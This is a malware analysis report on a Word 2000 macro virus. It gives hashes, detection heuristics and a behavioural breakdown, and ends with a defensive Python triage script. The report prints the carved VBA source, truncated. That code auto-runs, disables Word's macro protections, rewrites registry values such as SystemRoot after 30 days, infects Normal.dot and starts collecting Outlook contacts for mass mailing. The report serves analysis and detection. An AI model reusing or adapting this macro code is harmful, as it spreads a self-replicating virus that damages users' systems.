Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7e9a1710345357aa…

MALICIOUS

Office (OLE)

Size: 42.5 KB
Created: 2000-08-21 21:04:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 3229ba00295d33114e948fa2534a60ff
SHA-1: 5d77a008d7699c3fa3009ea2a595db1291f48f6c
SHA-256: 7e9a1710345357aa0d795543eb5753ab5af765545ad1969f6fb49a41ceb48d65
Risk score: 260

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

The document carries one VBA module (VB_Name "Day_2") whose Document_New, Document_Open and Document_Close handlers all call the same routine, A0AX, so the code runs whenever the document is created, opened or closed. A0AX runs under On Error Resume Next and does four things.

First, it blunts Word's macro defences in the Normal template: the Alt+F8 (Macros) and Alt+F11 (Visual Basic Editor) key bindings are disabled, Tools > Macro and View > Toolbars are hidden, and Options.VirusProtection is set to False. It also looks for a value named "Lavel" under HKCU\Software\Microsoft\Office\9.0\Word\Security and, if it exists, writes 1 to it and greys out the Macro > Security... menu entry. The value Word 2000 reads for its macro security setting is "Level", so this write is a misspelling that never lowers the setting, and on a clean machine that branch is not taken at all because "Lavel" is not present. The Office 9.0 path means the code targets Word 2000, although the file metadata reports Word 8.0 as the authoring application.

Second, it writes infection markers under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion: RegisteredOwner becomes "Alina Liton" and FatehIns records the date of first infection. Once more than 30 days have passed since FatehIns it also overwrites ProductId with "Fateha-Liton-Alina" and SystemRoot with "C:\A0AAX", pointing the registry's record of the Windows installation directory at a folder that does not exist. None of these are autostart entries, so the T1547.001 mapping above describes the registry writes rather than the actual persistence mechanism, which is the next step.

Third, it replicates between the open document and Normal.dot through the VBProject object model: the first VBComponent of each is exported to Fateha.dll and Liton.dll alongside the template, both modules are emptied and refilled with AddFromFile (the template always receives the document's copy; the document receives the template's copy if one existed, otherwise its own), the first four lines of each import are deleted, and the modules are renamed "Day_<weekday>" and "DT<month>_<year>" so that the module name changes with the date. The carved module's name, Day_2, matches that pattern. Infecting the global template is what gives the code persistence: every document created or opened afterwards runs it.

Finally, it creates Outlook.Application, logs on to the MAPI namespace and walks every address list, adding each entry as a recipient of a new mail item, which is the start of a mass-mailing routine; the extracted source is truncated before any send call appears. Taken together, this is a self-replicating Word 2000 macro virus with a date-triggered destructive payload and a mail component; nothing in the visible code fetches or drops a second-stage binary.

Heuristics (5)

  • ClamAV: Doc.Trojan.Cobra-11 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Trojan.Cobra-11
  • VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]
    The document contains VBA macro code (see the carved macros.bas below).
  • Document_Open macro (high) [OLE_VBA_DOCOPEN]
    The module defines a Document_Open handler, so the macro runs as soon as the document is opened; Document_New and Document_Close call the same routine.
  • CreateObject call (high) [OLE_VBA_CREATEOBJ]
    CreateObject is used to instantiate Outlook.Application, giving the macro access to the MAPI address book.
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents and documents whose source could not be extracted, where no visible source is available.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  4806 bytes
SHA-256: 8482bcac51059b5e7dd2ef7ab242c222ed645698201eda3df7e77814f530894e
Detection: ClamAV Win.Trojan.wmvg-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "Day_2"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_New()
Call A0AX
End Sub
Private Sub Document_Close()
Call A0AX
End Sub
Private Sub Document_Open()
Call A0AX
End Sub
Private Sub A0AX()
On Error Resume Next
CustomizationContext = NormalTemplate
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
CommandBars("Tools").Controls("Macro").Visible = False
CommandBars("View").Controls("Toolbars").Enabled = False
CommandBars("View").Controls("Toolbars").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False: Options.ConfirmConversions = False
End If
If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") <> "Alina Liton" Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Alina Liton"
End If
InsFat = Date
If Not IsDate(System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns")) Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns") = Date
Else
InsFat = System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns")
End If
TotDy = DateValue(Date) - DateValue(InsFat)
If TotDy > 30 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "ProductId") = "Fateha-Liton-Alina"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") = "C:\A0AAX"
End If
Set ADC1 = ActiveDocument.VBProject.VBComponents(1): Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
ExportFile1 = NormalTemplate.Path + "\Fateha.dll": ExportFile2 = NormalTemplate.Path + "\Liton.dll"
If UCase(Dir(ExportFile1)) = UCase("Fateha.dll") Then Kill ExportFile1
If UCase(Dir(ExportFile2)) = UCase("Liton.dll") Then Kill ExportFile2
If ADC1.CodeModule.CountOfLines > 0 Then ADC1.Export (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then NDC1.Export (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To ADC1.CodeModule.CountOfLines: ADC1.CodeModule.DeleteLines 1: Next
End If
ADC1.CodeModule.AddFromFile (ExportFile2)
If ADC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next
Else
ADC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: ADC1.CodeModule.DeleteLines 1: Next: End If
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To NDC1.CodeModule.CountOfLines: NDC1.CodeModule.DeleteLines 1: Next
End If
NDC1.CodeModule.AddFromFile (ExportFile1)
If NDC1.CodeModule.CountOfLines > 0 Then
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
Else
NDC1.CodeModule.AddFromFile (ExportFile1)
For i = 1 To 4: NDC1.CodeModule.DeleteLines 1: Next
End If
WD = WeekDay(Date)
WD = "Day_" + Trim(Str(WD))
If NDC1.Name <> WD Then NDC1.Name = WD
If ADC1.Name <> "DT" & Trim(Str(Month(Date))) + "_" + Trim(Str(Year(Date))) Then ADC1.Name = "DT" & Trim(Str(Month(Date))) + "_" + Trim(Str(Year(Date)))
Dim UDO, DMN, BUOS
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
DMN.Logon "profile", "password"
For l = DMN.AddressLists.Count To 1 Step -1
Set ADB = DMN.AddressLists(l)
i = 0
Set BUOS = UDO.CreateItem(0)
For t = ADB.AdressEntries.Count To 1 Step -1
o = ADB.AddressEntries(i)
BUOS.Recipients.Add o
i = i + 1
If 
... (truncated)
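The behaviours summarised under Malware Insights and flagged by the heuristics above can be pulled out of the decoded macro mechanically. The following Python script is an added example written for this page; it is not part of the original report or of oletools. It runs over a constructed excerpt of the listing above (SAMPLE_VBA), and the regexes, the finding labels and the layout of the triage() report are this editor's own choices rather than any existing tool's output. Registry writes are recognised by the `System.PrivateProfileString("", key, value) = data` form; the same call compared with `<>` or wrapped in IsDate() is a read and is ignored.

```python
"""Triage of a decoded Word VBA macro for the behaviours reported above.

Added example for this page, not part of the original report or of oletools.
Input is the decoded VBA source text (here a constructed excerpt abridged from
the listing above). It extracts auto-execution entry points, registry values
written through System.PrivateProfileString, security-tampering calls,
Normal.dot self-replication, Outlook automation and the day-count trigger.
"""
import re

# Constructed excerpt: the key lines of the extracted macro, abridged.
SAMPLE_VBA = r'''Private Sub Document_New()
Call A0AX
End Sub
Private Sub Document_Open()
Call A0AX
End Sub
Private Sub A0AX()
On Error Resume Next
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Lavel") = 1&
CommandBars("Tools").Controls("Macro").Visible = False
Options.VirusProtection = False: Options.SaveNormalPrompt = False
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "Alina Liton"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "FatehIns") = Date
TotDy = DateValue(Date) - DateValue(InsFat)
If TotDy > 30 Then
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "SystemRoot") = "C:\A0AAX"
End If
Set NDC1 = NormalTemplate.VBProject.VBComponents(1)
NDC1.Export (ExportFile2)
NDC1.CodeModule.AddFromFile (ExportFile1)
Set UDO = CreateObject("Outlook.Application")
Set DMN = UDO.GetNameSpace("MAPI")
End Sub
'''

# Procedures Word runs without user action (Word 97/2000-era names).
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Private\s+|Public\s+)?Sub\s+'
    r'(Auto_?Open|Auto_?Close|AutoNew|AutoExec|Document_(?:Open|New|Close))\s*\(', re.I | re.M)
# System.PrivateProfileString("", "<key>", "<value>") = <data>  is a registry write.
REG_WRITE_RE = re.compile(
    r'System\.PrivateProfileString\(\s*""\s*,\s*"([^"]+)"\s*,\s*"([^"]+)"\s*\)'
    r'\s*=\s*("[^"]*"|[^\r\n:]+)', re.I)
WORD_SECURITY_RE = re.compile(r'Office\\\d+\.\d+\\Word\\Security"\s*,\s*"(\w+)"\s*\)\s*=', re.I)
SECURITY_TAMPER = {
    "VirusProtection=False": re.compile(r'Options\.VirusProtection\s*=\s*False', re.I),
    "macro-keys-disabled": re.compile(r'FindKey\(.*wdKeyF(?:8|11).*\)\.Disable', re.I),
    "macro-menu-hidden": re.compile(
        r'CommandBars\("Tools"\)\.Controls\("Macro"\)\.(?:Enabled|Visible)\s*=\s*False', re.I),
}
SELF_REPLICATION_RE = re.compile(
    r'NormalTemplate\.VBProject|\.CodeModule\.AddFromFile|\.Export\s*\(', re.I)
MAIL_RE = re.compile(r'CreateObject\(\s*"Outlook\.Application"\s*\)|GetNameSpace\(\s*"MAPI"\s*\)', re.I)
# "<v> = DateValue(Date) - DateValue(<x>)" later tested as "If <v> > N Then": a day-count trigger.
DELAY_RE = re.compile(
    r'(\w+)\s*=\s*DateValue\(Date\)\s*-\s*DateValue\(\w+\)[\s\S]*?If\s+\1\s*>\s*(\d+)\s+Then', re.I)


def autoexec_entry_points(src):
    return sorted({m.group(1) for m in AUTOEXEC_RE.finditer(src)}, key=str.lower)

def registry_writes(src):
    # (key, value name, data expression); a trailing backslash on the key is dropped.
    return [(k.rstrip("\\"), n, d.strip()) for k, n, d in REG_WRITE_RE.findall(src)]

def security_tampering(src):
    return [label for label, rx in SECURITY_TAMPER.items() if rx.search(src)]

def word_security_writes(src):
    # Value names written under the Word Security key, paired with whether the name is
    # "Level", the value Word 2000 reads; the misspelt "Lavel" never lowers the setting.
    return [(name, name.lower() == "level") for name in WORD_SECURITY_RE.findall(src)]

def self_replication(src):
    # VBProject calls used to copy the module into Normal.dot and back.
    return sorted({m.group(0).replace(" ", "") for m in SELF_REPLICATION_RE.finditer(src)})

def mail_automation(src):
    return MAIL_RE.findall(src)

def delayed_payload_days(src):
    # Days after the stored install date before the second-stage writes run, or None.
    m = DELAY_RE.search(src)
    return int(m.group(2)) if m else None

def triage(src):
    report = {
        "autoexec": autoexec_entry_points(src),
        "registry_writes": registry_writes(src),
        "security_tampering": security_tampering(src),
        "word_security_writes": word_security_writes(src),
        "self_replication": self_replication(src),
        "mail_automation": mail_automation(src),
        "delay_days": delayed_payload_days(src),
    }
    # Auto-execution plus writing itself into Normal.dot is what makes this a macro virus.
    report["macro_virus"] = bool(report["autoexec"]) and "NormalTemplate.VBProject" in report["self_replication"]
    return report

if __name__ == "__main__":
    print(triage(SAMPLE_VBA))
```

To run it against the real artifact, replace SAMPLE_VBA with the contents of the carved macros.bas; because the checks are line-oriented regexes over decoded source, they say nothing about a document that only ships p-code, which is exactly the gap the OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic above exists to cover.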